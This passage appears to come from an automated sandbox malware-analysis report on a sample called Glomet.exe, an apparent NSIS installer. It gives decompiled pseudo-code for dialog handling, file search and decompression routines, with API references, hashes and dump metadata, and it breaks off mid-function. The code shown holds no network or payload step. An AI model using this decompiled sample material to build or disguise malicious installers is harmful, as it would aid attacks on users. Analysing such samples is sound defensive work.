								if( *((intOrPtr*)( *0x42f430 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens") {
									E004062EA(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					} else {
						_a8 = 0x40f;
						goto L12;
					}
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C56(_t146) != 0 && E00405C82(_t146) == 0) {
						E00405BE9(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D4(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D4(_t166);
					E00404309(_t165);
					_t138 = E00406663(8);
					if(_t138 == 0) {
						L53:
						return E0040433B(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}















































                                                                                                                                                                              0x00404766
                                                                                                                                                                              0x0040476c
                                                                                                                                                                              0x00404772
                                                                                                                                                                              0x0040477f
                                                                                                                                                                              0x0040478d
                                                                                                                                                                              0x00404790
                                                                                                                                                                              0x00404798
                                                                                                                                                                              0x0040479e
                                                                                                                                                                              0x0040479e
                                                                                                                                                                              0x004047aa
                                                                                                                                                                              0x004047ad
                                                                                                                                                                              0x0040481b
                                                                                                                                                                              0x00404822
                                                                                                                                                                              0x004048f9
                                                                                                                                                                              0x00404900
                                                                                                                                                                              0x0040490f
                                                                                                                                                                              0x0040490f
                                                                                                                                                                              0x00404913
                                                                                                                                                                              0x0040491d
                                                                                                                                                                              0x0040492a
                                                                                                                                                                              0x0040492c
                                                                                                                                                                              0x0040492c
                                                                                                                                                                              0x0040493a
                                                                                                                                                                              0x00404941
                                                                                                                                                                              0x00404948
                                                                                                                                                                              0x0040494b
                                                                                                                                                                              0x00404982
                                                                                                                                                                              0x00404984
                                                                                                                                                                              0x0040498a
                                                                                                                                                                              0x0040498f
                                                                                                                                                                              0x00404993
                                                                                                                                                                              0x00404995
                                                                                                                                                                              0x00404995
                                                                                                                                                                              0x004049b1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004049b3
                                                                                                                                                                              0x004049b6
                                                                                                                                                                              0x004049c4
                                                                                                                                                                              0x004049ca
                                                                                                                                                                              0x004049cb
                                                                                                                                                                              0x004049ce
                                                                                                                                                                              0x004049d1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004049d1
                                                                                                                                                                              0x0040494d
                                                                                                                                                                              0x0040494f
                                                                                                                                                                              0x00404953
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404955
                                                                                                                                                                              0x00404955
                                                                                                                                                                              0x00404962
                                                                                                                                                                              0x00404967
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040496b
                                                                                                                                                                              0x0040496d
                                                                                                                                                                              0x0040496d
                                                                                                                                                                              0x00404975
                                                                                                                                                                              0x00404977
                                                                                                                                                                              0x0040497a
                                                                                                                                                                              0x0040497d
                                                                                                                                                                              0x00404980
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404980
                                                                                                                                                                              0x004049dd
                                                                                                                                                                              0x004049e7
                                                                                                                                                                              0x004049ea
                                                                                                                                                                              0x004049ed
                                                                                                                                                                              0x004049f4
                                                                                                                                                                              0x004049f4
                                                                                                                                                                              0x004049f6
                                                                                                                                                                              0x004049f6
                                                                                                                                                                              0x004049fb
                                                                                                                                                                              0x004049fd
                                                                                                                                                                              0x00404a05
                                                                                                                                                                              0x00404a0c
                                                                                                                                                                              0x00404a0e
                                                                                                                                                                              0x00404a19
                                                                                                                                                                              0x00404a19
                                                                                                                                                                              0x00404a0e
                                                                                                                                                                              0x00404a20
                                                                                                                                                                              0x00404a29
                                                                                                                                                                              0x00404a33
                                                                                                                                                                              0x00404a3b
                                                                                                                                                                              0x00404a56
                                                                                                                                                                              0x00404a3d
                                                                                                                                                                              0x00404a46
                                                                                                                                                                              0x00404a46
                                                                                                                                                                              0x00404a3b
                                                                                                                                                                              0x00404a5b
                                                                                                                                                                              0x00404a60
                                                                                                                                                                              0x00404a65
                                                                                                                                                                              0x00404a6e
                                                                                                                                                                              0x00404a6e
                                                                                                                                                                              0x00404a77
                                                                                                                                                                              0x00404a79
                                                                                                                                                                              0x00404a79
                                                                                                                                                                              0x00404a85
                                                                                                                                                                              0x00404a8d
                                                                                                                                                                              0x00404a8f
                                                                                                                                                                              0x00404a95
                                                                                                                                                                              0x00404a97
                                                                                                                                                                              0x00404a97
                                                                                                                                                                              0x00404a95
                                                                                                                                                                              0x00404a9c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404a9c
                                                                                                                                                                              0x0040494b
                                                                                                                                                                              0x00404902
                                                                                                                                                                              0x00404909
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404909
                                                                                                                                                                              0x00404828
                                                                                                                                                                              0x00404831
                                                                                                                                                                              0x0040484b
                                                                                                                                                                              0x00404850
                                                                                                                                                                              0x0040485a
                                                                                                                                                                              0x00404861
                                                                                                                                                                              0x0040486d
                                                                                                                                                                              0x00404870
                                                                                                                                                                              0x00404873
                                                                                                                                                                              0x0040487a
                                                                                                                                                                              0x00404882
                                                                                                                                                                              0x00404885
                                                                                                                                                                              0x00404889
                                                                                                                                                                              0x00404890
                                                                                                                                                                              0x00404898
                                                                                                                                                                              0x004048f2
                                                                                                                                                                              0x0040489a
                                                                                                                                                                              0x0040489b
                                                                                                                                                                              0x004048a2
                                                                                                                                                                              0x004048ac
                                                                                                                                                                              0x004048b4
                                                                                                                                                                              0x004048c1
                                                                                                                                                                              0x004048d5
                                                                                                                                                                              0x004048d9
                                                                                                                                                                              0x004048d9
                                                                                                                                                                              0x004048d5
                                                                                                                                                                              0x004048de
                                                                                                                                                                              0x004048eb
                                                                                                                                                                              0x004048eb
                                                                                                                                                                              0x00404898
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404850
                                                                                                                                                                              0x0040483e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404844
                                                                                                                                                                              0x00404844
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404844
                                                                                                                                                                              0x004047af
                                                                                                                                                                              0x004047bc
                                                                                                                                                                              0x004047c5
                                                                                                                                                                              0x004047d2
                                                                                                                                                                              0x004047d2
                                                                                                                                                                              0x004047d9
                                                                                                                                                                              0x004047df
                                                                                                                                                                              0x004047e8
                                                                                                                                                                              0x004047eb
                                                                                                                                                                              0x004047ee
                                                                                                                                                                              0x004047f6
                                                                                                                                                                              0x004047f9
                                                                                                                                                                              0x004047fc
                                                                                                                                                                              0x00404802
                                                                                                                                                                              0x00404809
                                                                                                                                                                              0x00404810
                                                                                                                                                                              0x00404aa2
                                                                                                                                                                              0x00404ab4
                                                                                                                                                                              0x00404816
                                                                                                                                                                              0x00404819
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404819
                                                                                                                                                                              0x00404810

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004047B5
                                                                                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 004047DF
                                                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404890
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040489B
                                                                                                                                                                              • lstrcmpiA.KERNEL32(ExecToStack,ARBEJDSTILLADELSER Setup: Installing,00000000,?,?), ref: 004048CD
                                                                                                                                                                              • lstrcatA.KERNEL32(?,ExecToStack), ref: 004048D9
                                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 004048EB
                                                                                                                                                                                • Part of subcall function 00405951: GetDlgItemTextA.USER32 ref: 00405964
                                                                                                                                                                                • Part of subcall function 00406535: CharNextA.USER32(0000000B,*?|<>/":,00000000,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                                                                                                                • Part of subcall function 00406535: CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659A
                                                                                                                                                                                • Part of subcall function 00406535: CharNextA.USER32(0000000B,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659F
                                                                                                                                                                                • Part of subcall function 00406535: CharPrevA.USER32(0000000B,0000000B,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ,0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004065AF
                                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 004049A9
                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C4
                                                                                                                                                                                • Part of subcall function 00404B1D: lstrlenA.KERNEL32(ARBEJDSTILLADELSER Setup: Installing,ARBEJDSTILLADELSER Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                                                                                                                                                • Part of subcall function 00404B1D: wsprintfA.USER32 ref: 00404BC3
                                                                                                                                                                                • Part of subcall function 00404B1D: SetDlgItemTextA.USER32 ref: 00404BD6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                              • String ID: A$ARBEJDSTILLADELSER Setup: Installing$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens$ExecToStack
                                                                                                                                                                              • API String ID: 2624150263-4159307710
                                                                                                                                                                              • Opcode ID: 77a47a1ab08589053cc7753b654a21a624dca3a385ae25c0a950fb0e42879f7b
                                                                                                                                                                              • Instruction ID: 575699f201696e67f0f9c35a0e1f8108b56c42fe30a04e4012ee5e208413707b
                                                                                                                                                                              • Opcode Fuzzy Hash: 77a47a1ab08589053cc7753b654a21a624dca3a385ae25c0a950fb0e42879f7b
                                                                                                                                                                              • Instruction Fuzzy Hash: 89A18FB1A00209ABDB11AFA6CD41AAF77B8AF84314F14843BF601B62D1D77C99518F6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004027AA Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                                              			E004027AA(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402C39(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061B5(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406257();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                                                                              0x004027c2
                                                                                                                                                                              0x004027d6
                                                                                                                                                                              0x004027e1
                                                                                                                                                                              0x004027e2
                                                                                                                                                                              0x00402931
                                                                                                                                                                              0x004027c4
                                                                                                                                                                              0x004027c4
                                                                                                                                                                              0x004027c6
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x004027c8
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                              • Opcode ID: 416b82a8e7ce6a9283ba158689e0c1d29776a88bfb89b879210539ae0270608b
                                                                                                                                                                              • Instruction ID: b48363985cd602751ae38a2791165fd5af0714f22da7c63f7ced5d0d9316473d
                                                                                                                                                                              • Opcode Fuzzy Hash: 416b82a8e7ce6a9283ba158689e0c1d29776a88bfb89b879210539ae0270608b
                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF0A072608144AAD710EBA49A49AEEB7689F51324F60447BF142B20C1D6B849459B3A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00406AA8 Relevance: .3, Instructions: 334COMMONCrypto
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                              			E00406AA8(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00407217( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040727F( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004071D7))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
